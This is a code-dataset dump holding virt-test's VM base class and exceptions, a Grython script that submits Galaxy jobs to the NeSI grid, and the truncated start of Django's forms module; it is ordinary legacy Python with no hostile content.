repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
imammedo/virt-test
|
refs/heads/master
|
virttest/virt_vm.py
|
2
|
import logging, time, glob, re
from autotest.client.shared import error
import utils_misc, utils_net, remote
class VMError(Exception):
pass
class VMCreateError(VMError):
def __init__(self, cmd, status, output):
VMError.__init__(self, cmd, status, output)
self.cmd = cmd
self.status = status
self.output = output
def __str__(self):
return ("VM creation command failed: %r (status: %s, "
"output: %r)" % (self.cmd, self.status, self.output))
class VMStartError(VMError):
def __init__(self, name, reason=None):
VMError.__init__(self, name, reason)
self.name = name
self.reason = reason
def __str__(self):
msg = "VM '%s' failed to start" % self.name
if self.reason is not None:
msg += ": %s" % self.reason
return msg
class VMConfigMissingError(VMError):
def __init__(self, name, config):
VMError.__init__(self, name, config)
self.name = name
self.config = config
def __str__(self):
return "Missing config '%s' for VM %s" % (self.config, self.name)
class VMHashMismatchError(VMError):
def __init__(self, actual, expected):
VMError.__init__(self, actual, expected)
self.actual_hash = actual
self.expected_hash = expected
def __str__(self):
return ("CD image hash (%s) differs from expected one (%s)" %
(self.actual_hash, self.expected_hash))
class VMImageMissingError(VMError):
def __init__(self, filename):
VMError.__init__(self, filename)
self.filename = filename
def __str__(self):
return "CD image file not found: %r" % self.filename
class VMImageCheckError(VMError):
def __init__(self, filename):
VMError.__init__(self, filename)
self.filename = filename
def __str__(self):
return "Errors found on image: %r" % self.filename
class VMBadPATypeError(VMError):
def __init__(self, pa_type):
VMError.__init__(self, pa_type)
self.pa_type = pa_type
def __str__(self):
return "Unsupported PCI assignable type: %r" % self.pa_type
class VMPAError(VMError):
def __init__(self, pa_type):
VMError.__init__(self, pa_type)
self.pa_type = pa_type
def __str__(self):
return ("No PCI assignable devices could be assigned "
"(pci_assignable=%r)" % self.pa_type)
class VMPostCreateError(VMError):
def __init__(self, cmd, output):
VMError.__init__(self, cmd, output)
self.cmd = cmd
self.output = output
class VMHugePageError(VMPostCreateError):
def __str__(self):
return ("Cannot allocate hugepage memory (command: %r, "
"output: %r)" % (self.cmd, self.output))
class VMKVMInitError(VMPostCreateError):
def __str__(self):
return ("Cannot initialize KVM (command: %r, output: %r)" %
(self.cmd, self.output))
class VMDeadError(VMError):
def __init__(self, reason='', detail=''):
VMError.__init__(self)
self.reason = reason
self.detail = detail
def __str__(self):
msg = "VM is dead"
if self.reason:
msg += " reason: %s" % self.reason
if self.detail:
msg += " detail: %r" % self.detail
return (msg)
class VMDeadKernelCrashError(VMError):
def __init__(self, kernel_crash):
VMError.__init__(self, kernel_crash)
self.kernel_crash = kernel_crash
def __str__(self):
return ("VM is dead due to a kernel crash:\n%s" % self.kernel_crash)
class VMInvalidInstructionCode(VMError):
def __init__(self, invalid_code):
VMError.__init__(self, invalid_code)
self.invalid_code = invalid_code
def __str__(self):
error = ""
for invalid_code in self.invalid_code:
error += "%s" % (invalid_code)
return ("Invalid instruction was executed on VM:\n%s" % error)
class VMAddressError(VMError):
pass
class VMPortNotRedirectedError(VMAddressError):
def __init__(self, port):
VMAddressError.__init__(self, port)
self.port = port
def __str__(self):
return "Port not redirected: %s" % self.port
class VMAddressVerificationError(VMAddressError):
def __init__(self, mac, ip):
VMAddressError.__init__(self, mac, ip)
self.mac = mac
self.ip = ip
def __str__(self):
return ("Could not verify DHCP lease: "
"%s --> %s" % (self.mac, self.ip))
class VMMACAddressMissingError(VMAddressError):
def __init__(self, nic_index):
VMAddressError.__init__(self, nic_index)
self.nic_index = nic_index
def __str__(self):
return "No MAC defined for NIC #%s" % self.nic_index
class VMIPAddressMissingError(VMAddressError):
def __init__(self, mac):
VMAddressError.__init__(self, mac)
self.mac = mac
def __str__(self):
return "No DHCP lease for MAC %s" % self.mac
class VMUnknownNetTypeError(VMError):
def __init__(self, vmname, nicname, nettype):
super(VMUnknownNetTypeError, self).__init__()
self.vmname = vmname
self.nicname = nicname
self.nettype = nettype
def __str__(self):
return "Unknown nettype '%s' requested for NIC %s on VM %s" % (
self.nettype, self.nicname, self.vmname)
class VMAddNetDevError(VMError):
pass
class VMDelNetDevError(VMError):
pass
class VMAddNicError(VMError):
pass
class VMDelNicError(VMError):
pass
class VMMigrateError(VMError):
pass
class VMMigrateTimeoutError(VMMigrateError):
pass
class VMMigrateCancelError(VMMigrateError):
pass
class VMMigrateFailedError(VMMigrateError):
pass
class VMMigrateProtoUnsupportedError(VMMigrateError):
pass
class VMMigrateStateMismatchError(VMMigrateError):
def __init__(self):
VMMigrateError.__init__(self)
def __str__(self):
return ("Mismatch of VM state before and after migration")
class VMRebootError(VMError):
pass
class VMStatusError(VMError):
pass
class VMRemoveError(VMError):
pass
class VMDeviceError(VMError):
pass
class VMDeviceNotSupportedError(VMDeviceError):
def __init__(self, name, device):
VMDeviceError.__init__(self, name, device)
self.name = name
self.device = device
def __str__(self):
return ("Device '%s' is not supported for vm '%s' on this Host." %
(self.device, self.name))
class VMPCIDeviceError(VMDeviceError):
pass
class VMPCISlotInUseError(VMPCIDeviceError):
def __init__(self, name, slot):
VMPCIDeviceError.__init__(self, name, slot)
self.name = name
self.slot = slot
def __str__(self):
return ("PCI slot '0x%s' is already in use on vm '%s'. Please assign"
" another slot in config file." % (self.slot, self.name))
class VMPCIOutOfRangeError(VMPCIDeviceError):
def __init__(self, name, max_dev_num):
VMPCIDeviceError.__init__(self, name, max_dev_num)
self.name = name
self.max_dev_num = max_dev_num
def __str__(self):
return ("Too many PCI devices added on vm '%s', max supported '%s'" %
(self.name, str(self.max_dev_num)))
class VMUSBError(VMError):
pass
class VMUSBControllerError(VMUSBError):
pass
class VMUSBControllerMissingError(VMUSBControllerError):
def __init__(self, name, controller_type):
VMUSBControllerError.__init__(self, name, controller_type)
self.name = name
self.controller_type = controller_type
def __str__(self):
return ("Could not find '%s' USB Controller on vm '%s'. Please "
"check config files." % (self.controller_type, self.name))
class VMUSBControllerPortFullError(VMUSBControllerError):
def __init__(self, name):
VMUSBControllerError.__init__(self, name)
self.name = name
def __str__(self):
return ("No available USB Controller port left for VM %s." % self.name)
class VMScreenInactiveError(VMError):
def __init__(self, vm, inactive_time):
VMError.__init__(self)
self.vm = vm
self.inactive_time = inactive_time
def __str__(self):
msg = ("%s screen is inactive for %d s (%d min)" %
(self.vm.name, self.inactive_time, self.inactive_time/60))
return msg
class CpuInfo(object):
"""
A class for VM's cpu information.
"""
def __init__(self, model=None, vendor=None, flags=None, family=None,
smp=0, maxcpus=0, sockets=0, cores=0, threads=0):
"""
@param model: CPU Model of VM (use 'qemu -cpu ?' for list)
@param vendor: CPU Vendor of VM
@param flags: CPU Flags of VM
@param flags: CPU Family of VM
@param smp: set the number of CPUs to 'n' [default=1]
@param maxcpus: maximum number of total cpus, including
offline CPUs for hotplug, etc
@param cores: number of CPU cores on one socket
@param threads: number of threads on one CPU core
@param sockets: number of discrete sockets in the system
"""
self.model = model
self.vendor = vendor
self.flags = flags
self.family = family
self.smp = smp
self.maxcpus = maxcpus
self.sockets = sockets
self.cores = cores
self.threads = threads
class BaseVM(object):
"""
Base class for all hypervisor specific VM subclasses.
This class should not be used directly, that is, do not attempt to
instantiate and use this class. Instead, one should implement a subclass
that implements, at the very least, all methods defined right after the
the comment blocks that are marked with:
"Public API - *must* be reimplemented with virt specific code"
and
"Protected API - *must* be reimplemented with virt specific classes"
The current proposal regarding methods naming convention is:
- Public API methods: named in the usual way, consumed by tests
- Protected API methods: name begins with a single underline, to be
consumed only by BaseVM and subclasses
- Private API methods: name begins with double underline, to be consumed
only by the VM subclass itself (usually implements virt specific
functionality: example: __make_qemu_command())
So called "protected" methods are intended to be used only by VM classes,
and not be consumed by tests. Theses should respect a naming convention
and always be preceeded by a single underline.
Currently most (if not all) methods are public and appears to be consumed
by tests. It is a ongoing task to determine whether methods should be
"public" or "protected".
"""
#
# Assuming that all low-level hypervisor have at least migration via tcp
# (true for xen & kvm). Also true for libvirt (using xen and kvm drivers)
#
MIGRATION_PROTOS = ['tcp', ]
#
# Timeout definition. This is being kept inside the base class so that
# sub classes can change the default just for themselves
#
LOGIN_TIMEOUT = 10
LOGIN_WAIT_TIMEOUT = 240
COPY_FILES_TIMEOUT = 600
MIGRATE_TIMEOUT = 3600
REBOOT_TIMEOUT = 240
CREATE_TIMEOUT = 5
def __init__(self, name, params):
self.name = name
self.params = params
#
# Assuming all low-level hypervisors will have a serial (like) console
# connection to the guest. libvirt also supports serial (like) consoles
# (virDomainOpenConsole). subclasses should set this to an object that
# is or behaves like aexpect.ShellSession.
#
self.serial_console = None
self.remote_sessions = []
# Create instance if not already set
if not hasattr(self, 'instance'):
self._generate_unique_id()
# Don't overwrite existing state, update from params
if hasattr(self, 'virtnet'):
# Direct reference to self.virtnet makes pylint complain
# note: virtnet.__init__() supports being called anytime
getattr(self, 'virtnet').__init__(self.params,
self.name,
self.instance)
else: # Create new
self.virtnet = utils_net.VirtNet(self.params,
self.name,
self.instance)
if not hasattr(self, 'cpuinfo'):
self.cpuinfo = CpuInfo()
def _generate_unique_id(self):
"""
Generate a unique identifier for this VM
"""
while True:
self.instance = (time.strftime("%Y%m%d-%H%M%S-") +
utils_misc.generate_random_string(8))
if not glob.glob("/tmp/*%s" % self.instance):
break
#
# Public API - could be reimplemented with virt specific code
#
def needs_restart(self, name, params, basedir):
"""
Verifies whether the current virt_install commandline matches the
requested one, based on the test parameters.
"""
try:
need_restart = (self.make_create_command() !=
self.make_create_command(name, params, basedir))
except Exception:
need_restart = True
if need_restart:
logging.debug("VM params in env don't match requested, restarting.")
return True
else:
# Command-line encoded state doesn't include all params
# TODO: Check more than just networking
other_virtnet = utils_net.VirtNet(params, name, self.instance)
if self.virtnet != other_virtnet:
logging.debug("VM params in env match, but network differs, "
"restarting")
logging.debug("\t" + str(self.virtnet))
logging.debug("\t!=")
logging.debug("\t" + str(other_virtnet))
return True
else:
logging.debug("VM params in env do match requested, continuing.")
return False
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
Can be subclassed to provide better information on why the VM is
not alive (reason, detail)
@raise VMDeadError: If the VM is dead
@raise: Various monitor exceptions if the monitor is unresponsive
"""
if self.is_dead():
raise VMDeadError
def get_mac_address(self, nic_index=0):
"""
Return the MAC address of a NIC.
@param nic_index: Index of the NIC
@raise VMMACAddressMissingError: If no MAC address is defined for the
requested NIC
"""
try:
mac = self.virtnet[nic_index].mac
return mac
except KeyError:
raise VMMACAddressMissingError(nic_index)
def get_address(self, index=0):
"""
Return the IP address of a NIC or guest (in host space).
@param index: Name or index of the NIC whose address is requested.
@return: 'localhost': Port redirection is in use
@return: IP address of NIC if valid in arp cache.
@raise VMMACAddressMissingError: If no MAC address is defined for the
requested NIC
@raise VMIPAddressMissingError: If no IP address is found for the the
NIC's MAC address
@raise VMAddressVerificationError: If the MAC-IP address mapping cannot
be verified (using arping)
"""
nic = self.virtnet[index]
# TODO: Determine port redirection in use w/o checking nettype
if nic.nettype != 'bridge':
return "localhost"
if not nic.has_key('mac') and self.params.get('vm_type') == 'libvirt':
# Look it up from xml
nic.mac = self.get_virsh_mac_address(index)
# else TODO: Look up mac from existing qemu-kvm process
if not nic.has_key('mac'):
raise VMMACAddressMissingError(index)
else:
# Get the IP address from arp cache, try upper and lower case
arp_ip = self.address_cache.get(nic.mac.upper())
if not arp_ip:
arp_ip = self.address_cache.get(nic.mac.lower())
if not arp_ip:
raise VMIPAddressMissingError(nic.mac)
# Make sure the IP address is assigned to one or more macs
# for this guest
macs = self.virtnet.mac_list()
if not utils_net.verify_ip_address_ownership(arp_ip, macs):
raise VMAddressVerificationError(nic.mac, arp_ip)
logging.debug('Found/Verified IP %s for VM %s NIC %s' % (
arp_ip, self.name, str(index)))
return arp_ip
def fill_addrs(self, addrs):
"""
Fill VM's nic address to the virtnet structure based on VM's address
structure addrs.
@param addrs: Dict of interfaces and address
{"if_name":{"mac":['addrs',],
"ipv4":['addrs',],
"ipv6":['addrs',]},
...}
"""
for virtnet in self.virtnet:
for iface_name, iface in addrs.iteritems():
if virtnet.mac in iface["mac"]:
virtnet.ip = {"ipv4": iface["ipv4"],
"ipv6": iface["ipv6"]}
virtnet.g_nic_name = iface_name
def get_port(self, port, nic_index=0):
"""
Return the port in host space corresponding to port in guest space.
@param port: Port number in host space.
@param nic_index: Index of the NIC.
@return: If port redirection is used, return the host port redirected
to guest port port. Otherwise return port.
@raise VMPortNotRedirectedError: If an unredirected port is requested
in user mode
"""
if self.virtnet[nic_index].nettype == "bridge":
return port
else:
try:
return self.redirs[port]
except KeyError:
raise VMPortNotRedirectedError(port)
def free_mac_address(self, nic_index_or_name=0):
"""
Free a NIC's MAC address.
@param nic_index: Index of the NIC
"""
self.virtnet.free_mac_address(nic_index_or_name)
@error.context_aware
def wait_for_get_address(self, nic_index_or_name, timeout=30, internal_timeout=1):
"""
Wait for a nic to acquire an IP address, then return it.
"""
# Don't let VMIPAddressMissingError/VMAddressVerificationError through
def _get_address():
try:
return self.get_address(nic_index_or_name)
except (VMIPAddressMissingError, VMAddressVerificationError):
return False
if not utils_misc.wait_for(_get_address, timeout, internal_timeout):
raise VMIPAddressMissingError(self.virtnet[nic_index_or_name].mac)
return self.get_address(nic_index_or_name)
# Adding/setup networking devices methods split between 'add_*' for
# setting up virtnet, and 'activate_' for performing actions based
# on settings.
def add_nic(self, **params):
"""
Add new or setup existing NIC with optional model type and mac address
@param: **params: Additional NIC parameters to set.
@param: nic_name: Name for device
@param: mac: Optional MAC address, None to randomly generate.
@param: ip: Optional IP address to register in address_cache
@return: Dict with new NIC's info.
"""
if not params.has_key('nic_name'):
params['nic_name'] = utils_misc.generate_random_id()
nic_name = params['nic_name']
if nic_name in self.virtnet.nic_name_list():
self.virtnet[nic_name].update(**params)
else:
self.virtnet.append(params)
nic = self.virtnet[nic_name]
if not nic.has_key('mac'): # generate random mac
logging.debug("Generating random mac address for nic")
self.virtnet.generate_mac_address(nic_name)
# mac of '' or invaid format results in not setting a mac
if nic.has_key('ip') and nic.has_key('mac'):
if not self.address_cache.has_key(nic.mac):
logging.debug("(address cache) Adding static "
"cache entry: %s ---> %s" % (nic.mac, nic.ip))
else:
logging.debug("(address cache) Updating static "
"cache entry from: %s ---> %s"
" to: %s ---> %s" % (nic.mac,
self.address_cache[nic.mac], nic.mac, nic.ip))
self.address_cache[nic.mac] = nic.ip
return nic
def del_nic(self, nic_index_or_name):
"""
Remove the nic specified by name, or index number
"""
nic = self.virtnet[nic_index_or_name]
nic_mac = nic.mac.lower()
self.free_mac_address(nic_index_or_name)
try:
del self.virtnet[nic_index_or_name]
del self.address_cache[nic_mac]
except IndexError:
pass # continue to not exist
except KeyError:
pass # continue to not exist
def verify_kernel_crash(self):
"""
Find kernel crash message on the VM serial console.
@raise: VMDeadKernelCrashError, in case a kernel crash message was
found.
"""
if self.serial_console is not None:
data = self.serial_console.get_output()
match = re.search(r"BUG:.*---\[ end trace .* \]---", data,
re.DOTALL|re.MULTILINE)
if match is not None:
raise VMDeadKernelCrashError(match.group(0))
def verify_illegal_instruction(self):
"""
Find illegal instruction code on VM serial console output.
@raise: VMInvalidInstructionCode, in case a wrong instruction code.
"""
if self.serial_console is not None:
data = self.serial_console.get_output()
match = re.findall(r".*trap invalid opcode.*\n", data,
re.MULTILINE)
if match:
raise VMInvalidInstructionCode(match)
def get_params(self):
"""
Return the VM's params dict. Most modified params take effect only
upon VM.create().
"""
return self.params
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
@param name: The serial port name.
"""
if name:
return "/tmp/serial-%s-%s" % (name, self.instance)
return "/tmp/serial-%s" % self.instance
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("isa_serials")]
def get_testlog_filename(self):
"""
Return the testlog filename.
"""
return "/tmp/testlog-%s" % self.instance
def get_virtio_port_filename(self, port_name):
"""
Return the filename corresponding to a givven monitor name.
"""
return "/tmp/virtio_port-%s-%s" % (port_name, self.instance)
def get_virtio_port_filenames(self):
"""
Return a list of all virtio port filenames (as specified in the VM's
params).
"""
return [self.get_virtio_port_filename(v) for v in
self.params.objects("virtio_ports")]
@error.context_aware
def login(self, nic_index=0, timeout=LOGIN_TIMEOUT):
"""
Log into the guest via SSH/Telnet/Netcat.
If timeout expires while waiting for output from the guest (e.g. a
password prompt or a shell prompt) -- fail.
@param nic_index: The index of the NIC to connect to.
@param timeout: Time (seconds) before giving up logging into the
guest.
@return: A ShellSession object.
"""
error.context("logging into '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
prompt = self.params.get("shell_prompt", "[\#\$]")
linesep = eval("'%s'" % self.params.get("shell_linesep", r"\n"))
client = self.params.get("shell_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("shell_port")))
log_filename = ("session-%s-%s.log" %
(self.name, utils_misc.generate_random_string(4)))
session = remote.remote_login(client, address, port, username,
password, prompt, linesep,
log_filename, timeout)
session.set_status_test_command(self.params.get("status_test_command",
""))
self.remote_sessions.append(session)
return session
def remote_login(self, nic_index=0, timeout=LOGIN_TIMEOUT):
"""
Alias for login() for backward compatibility.
"""
return self.login(nic_index, timeout)
def wait_for_login(self, nic_index=0, timeout=LOGIN_WAIT_TIMEOUT,
internal_timeout=LOGIN_TIMEOUT):
"""
Make multiple attempts to log into the guest via SSH/Telnet/Netcat.
@param nic_index: The index of the NIC to connect to.
@param timeout: Time (seconds) to keep trying to log in.
@param internal_timeout: Timeout to pass to login().
@return: A ShellSession object.
"""
error_messages = []
logging.debug("Attempting to log into '%s' (timeout %ds)", self.name,
timeout)
end_time = time.time() + timeout
while time.time() < end_time:
try:
return self.login(nic_index, internal_timeout)
except (remote.LoginError, VMError), e:
self.verify_alive()
e = str(e)
if e not in error_messages:
logging.debug(e)
error_messages.append(e)
time.sleep(2)
# Timeout expired; try one more time but don't catch exceptions
return self.login(nic_index, internal_timeout)
@error.context_aware
def copy_files_to(self, host_path, guest_path, nic_index=0, limit="",
verbose=False, timeout=COPY_FILES_TIMEOUT):
"""
Transfer files to the remote host(guest).
@param host_path: Host path
@param guest_path: Guest path
@param nic_index: The index of the NIC to connect to.
@param limit: Speed limit of file transfer.
@param verbose: If True, log some stats using logging.debug (RSS only)
@param timeout: Time (seconds) before giving up on doing the remote
copy.
"""
error.context("sending file(s) to '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
client = self.params.get("file_transfer_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("file_transfer_port")))
log_filename = ("transfer-%s-to-%s-%s.log" %
(self.name, address,
utils_misc.generate_random_string(4)))
remote.copy_files_to(address, client, username, password, port,
host_path, guest_path, limit, log_filename,
verbose, timeout)
@error.context_aware
def copy_files_from(self, guest_path, host_path, nic_index=0, limit="",
verbose=False, timeout=COPY_FILES_TIMEOUT):
"""
Transfer files from the guest.
@param host_path: Guest path
@param guest_path: Host path
@param nic_index: The index of the NIC to connect to.
@param limit: Speed limit of file transfer.
@param verbose: If True, log some stats using logging.debug (RSS only)
@param timeout: Time (seconds) before giving up on doing the remote
copy.
"""
error.context("receiving file(s) from '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
client = self.params.get("file_transfer_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("file_transfer_port")))
log_filename = ("transfer-%s-from-%s-%s.log" %
(self.name, address,
utils_misc.generate_random_string(4)))
remote.copy_files_from(address, client, username, password, port,
guest_path, host_path, limit, log_filename,
verbose, timeout)
@error.context_aware
def serial_login(self, timeout=LOGIN_TIMEOUT):
"""
Log into the guest via the serial console.
If timeout expires while waiting for output from the guest (e.g. a
password prompt or a shell prompt) -- fail.
@param timeout: Time (seconds) before giving up logging into the guest.
@return: ShellSession object on success and None on failure.
"""
error.context("logging into '%s' via serial console" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
prompt = self.params.get("shell_prompt", "[\#\$]")
linesep = eval("'%s'" % self.params.get("shell_linesep", r"\n"))
status_test_command = self.params.get("status_test_command", "")
self.serial_console.set_linesep(linesep)
self.serial_console.set_status_test_command(status_test_command)
# Try to get a login prompt
self.serial_console.sendline()
remote._remote_login(self.serial_console, username, password,
prompt, timeout)
return self.serial_console
def wait_for_serial_login(self, timeout=LOGIN_WAIT_TIMEOUT,
internal_timeout=LOGIN_TIMEOUT):
"""
Make multiple attempts to log into the guest via serial console.
@param timeout: Time (seconds) to keep trying to log in.
@param internal_timeout: Timeout to pass to serial_login().
@return: A ShellSession object.
"""
error_messages = []
logging.debug("Attempting to log into '%s' via serial console "
"(timeout %ds)", self.name, timeout)
end_time = time.time() + timeout
while time.time() < end_time:
try:
return self.serial_login(internal_timeout)
except remote.LoginError, e:
self.verify_alive()
e = str(e)
if e not in error_messages:
logging.debug(e)
error_messages.append(e)
time.sleep(2)
# Timeout expired; try one more time but don't catch exceptions
return self.serial_login(internal_timeout)
def get_uuid(self):
"""
Catch UUID of the VM.
@return: None,if not specified in config file
"""
if self.params.get("uuid") == "random":
return self.uuid
else:
return self.params.get("uuid", None)
def send_string(self, sr):
"""
Send a string to the VM.
@param str: String, that must consist of alphanumeric characters only.
Capital letters are allowed.
"""
for char in sr:
if char.isupper():
self.send_key("shift-%s" % char.lower())
else:
self.send_key(char)
def get_cpu_count(self):
"""
Get the cpu count of the VM.
"""
session = self.login()
try:
return int(session.cmd(self.params.get("cpu_chk_cmd")))
finally:
session.close()
def get_memory_size(self, cmd=None):
"""
Get bootup memory size of the VM.
@param check_cmd: Command used to check memory. If not provided,
self.params.get("mem_chk_cmd") will be used.
"""
session = self.login()
try:
if not cmd:
cmd = self.params.get("mem_chk_cmd")
mem_str = session.cmd(cmd)
mem = re.findall("([0-9]+)", mem_str)
mem_size = 0
for m in mem:
mem_size += int(m)
if "GB" in mem_str:
mem_size *= 1024
elif "MB" in mem_str:
pass
else:
mem_size /= 1024
return int(mem_size)
finally:
session.close()
def get_current_memory_size(self):
"""
Get current memory size of the VM, rather than bootup memory.
"""
cmd = self.params.get("mem_chk_cur_cmd")
return self.get_memory_size(cmd)
#
# Public API - *must* be reimplemented with virt specific code
#
def is_alive(self):
"""
Return True if the VM is alive and the management interface is responsive.
"""
raise NotImplementedError
def is_dead(self):
"""
Return True if the the VM is dead.
"""
raise NotImplementedError
def activate_nic(self, nic_index_or_name):
"""
Activate an inactive network device
@param: nic_index_or_name: name or index number for existing NIC
"""
raise NotImplementedError
def deactivate_nic(self, nic_index_or_name):
"""
Deactivate an active network device
@param: nic_index_or_name: name or index number for existing NIC
"""
raise NotImplementedError
def verify_userspace_crash(self):
"""
Verify if the userspace component of the virtualization backend crashed.
"""
pass
def clone(self, name, **params):
"""
Return a clone of the VM object with optionally modified parameters.
This method should be implemented by
"""
raise NotImplementedError
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
@param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
@param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
"""
raise NotImplementedError
def migrate(self, timeout=MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path="/tmp", dest_host="localhost",
remote_port=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
@param timeout: Time to wait for migration to complete.
@param protocol: Migration protocol ('tcp', 'unix' or 'exec').
@param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
@param offline: If True, pause the source VM before migration.
@param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
@param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
@save_path: The path for state files.
@param dest_host: Destination host (defaults to 'localhost').
@param remote_port: Port to use for remote migration.
"""
raise NotImplementedError
def reboot(self, session=None, method="shell", nic_index=0,
timeout=REBOOT_TIMEOUT):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
@param session: A shell session object or None.
@param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
@param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
@param timeout: Time to wait for login to succeed (after rebooting).
@return: A new shell session object.
"""
raise NotImplementedError
# should this really be expected from VMs of all hypervisor types?
def send_key(self, keystr):
"""
Send a key event to the VM.
@param: keystr: A key event string (e.g. "ctrl-alt-delete")
"""
raise NotImplementedError
def save_to_file(self, path):
"""
State of paused VM recorded to path and VM shutdown on success
Throws a VMStatusError if before/after state is incorrect.
@param: path: file where VM state recorded
"""
raise NotImplementedError
def restore_from_file(self, path):
"""
A shutdown or paused VM is resumed from path, & possibly set running
Throws a VMStatusError if before/after restore state is incorrect
@param: path: path to file vm state was saved to
"""
raise NotImplementedError
def pause(self):
"""
Stop the VM operation.
"""
raise NotImplementedError
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
raise NotImplementedError
|
theboocock/NesiGridSelection
|
refs/heads/master
|
nesi/nesi_scripts/submit_job.py
|
2
|
#!~/NeSI_Tools/bin/grython
# FIXME: need an installer type thing to do ^^ correctly
#
# Author: Ed hills
# Date: 17/12/12
# Descr: This grython script will submit a job to the NeSI grid. This has not
# been made for batch jobs, only single jobs. Still early design. Is not
# complete.
# Arguments:
# argv1 = queue
# argv2 = group
# argv3 = galaxy job id
# argv4 = file to write jobname to
# argv5 = command line
# argv6-n = files to be staged in
# TODO: !! Add tool specific walltime !!
# TODO: !! Add tool specific memory usage !!
# TODO: add possibiility for emailing user if defined in galaxy config
# TODO: get application and check that it is ok to run on queue
from grisu.Grython import serviceInterface as si
from grisu.frontend.control.login import LoginManager
from grisu.frontend.model.job import JobObject, BatchJobObject, JobsException
from grisu.model import FileManager
from grisu.jcommons.constants import Constants
import time
import sys
import os
DEFAULT_GROUP = '/nz/nesi'
DEFAULT_QUEUE = 'pan:pan.nesi.org.nz'
DEFAULT_MEMORY = 21474836480# 8 GB
DEFAULT_WALLTIME = 6000 # 10 minutes
current_dir = os.path.abspath(os.path.curdir)
# TODO not use argv like this. use command line args instead
queue = sys.argv[1]
group = sys.argv[2]
galaxy_job_id = sys.argv[3]
jobname_file = sys.argv[4]
command = sys.argv[5]
job_script = sys.argv[6]
working_directory = sys.argv[7]
input_files = list()
job_header="""#!/bin/sh
%s
"""
if group == '':
group = DEFAULT_GROUP
if queue == '':
queue = DEFAULT_QUEUE
for f in sys.argv[8:]:
input_files.append(f)
try:
job = JobObject(si)
job.setSubmissionLocation(queue)
job.setTimestampJobname("galaxy_" + galaxy_job_id)
job.setMemory(DEFAULT_MEMORY)
job.setWalltimeInSeconds(DEFAULT_WALLTIME)
# stop annoying stats from being written to stderr
job.addEnvironmentVariable("SUPPRESS_STATS", "true")
#create the job script#
except:
print "Cannot setup the job environment"
sys.exit(-4)
#create nesi job_script
try:
# save jobname for job
njn = open(jobname_file, "w")
njn.write(job.getJobname())
njn.close()
except:
print "Cannot write jobname to file"
sys.exit(-2)
command_arguments = command.split()
print input_files
new_commandline = ""
file = open("/home/jamesboocock/blah.txt", 'a')
for arg in command_arguments:
file.write(arg + '\n')
arg=arg.replace('"','')
print("arg: " + arg)
if ((os.path.exists(arg)) or (os.path.isfile(arg)==True)) and (arg not in input_files) and ("_file" not in arg):
try:
job.addInputFileUrl(arg)
print "Stagin in: " + arg
file.write("stagin in 1" + arg + '\n')
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
elif ((os.path.exists(arg)) or (os.path.isfile(arg)==True)) and (arg not in input_files) and ("_file" in arg):
try:
folder=arg.split('/')[len(arg.split('/'))-2]
fil= arg.split('/')[len(arg.split('/'))-1]
argupdate=os.path.join(working_directory,os.path.join((folder.split('.')[0]), fil))
print "argupdate " + argupdate
if(os.path.isfile(argupdate)):
print "Stagin in: " + argupdate
file.write(argupdate + "did it work???")
file.write("stagin in 2 " + argupdate + '\n')
job.addInputFileUrl(argupdate)
else:
print "Stagin in: " + arg
file.write("stagin in 3" + arg + '\n')
file.write("arg update " + argupdate + '\n')
file.write("os path join" + os.path.join(folder.split('.')[0], fil))
job.addInputFileUrl(arg)
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
#Ensure we strip the basename of any files that exist or any files that will exist
if(os.path.exists(arg)) or (os.path.exists('/'.join(arg.split('/')[:len(arg.split('/'))-1]))):
new_commandline += (os.path.basename(arg) + " ")
else:
new_commandline += (arg + " ")
print job_header % (new_commandline)
job.setCommandline("bash "+ job_script.split('/')[-1])
try:
jscript = open(job_script, 'w')
script = job_header % (new_commandline)
jscript.write(script)
jscript.close()
except:
print "Cannot write job script"
sys.exit(-5)
try:
job.addInputFileUrl(job_script)
except:
print "Cannot stage nesi job script"
sys.exit(-5)
#open job file
#stage in the job file
for inputs in input_files:
try:
job.addInputFileUrl(inputs)
print "input: " + inputs
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
job.createJob(group)
print "Submitting job..."
try:
job.submitJob()
except Exception, e:
# Just catch all exceptions for time being. TODO
print "Cannot submit job currently."
print e
job.kill(True)
sys.exit(1)
# That's all folks!
sys.exit(0)
|
zsiciarz/django
|
refs/heads/master
|
django/forms/forms.py
|
9
|
"""
Form classes
"""
import copy
from collections import OrderedDict
from django.core.exceptions import NON_FIELD_ERRORS, ValidationError
# BoundField is imported for backwards compatibility in Django 1.9
from django.forms.boundfield import BoundField # NOQA
